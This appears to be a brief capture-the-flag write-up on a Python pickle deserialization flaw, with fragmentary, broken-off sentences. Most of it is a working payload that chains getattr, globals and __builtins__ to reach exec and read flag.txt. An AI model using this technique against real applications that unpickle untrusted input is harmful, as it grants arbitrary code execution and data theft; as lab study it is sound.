Python pickle deserialization vulnerability
The flag is located in
Pickle is used to save and load notes into the application.
getattr = GLOBAL ( '__builtin__' , 'getattr' )
dict = GLOBAL ( '__builtin__' , 'dict' )
dict_get = getattr ( dict , 'get' )
glo_dic = GLOBAL ( '__builtin__' , 'globals' )()
builtins = dict_get ( glo_dic , '__builtins__' )
exec = getattr ( builtins , 'exec' )
exec ("print(open('flag.txt', 'r').read())")
The idea is that using
getattr, we can get submodules of
__builtin__(and the submodules of the submodules).
builtins, which includes
exec. Once we have control over
exec, we can execute arbitrary code.
Submit the base64-encoded opcodes, and we obtain the flags.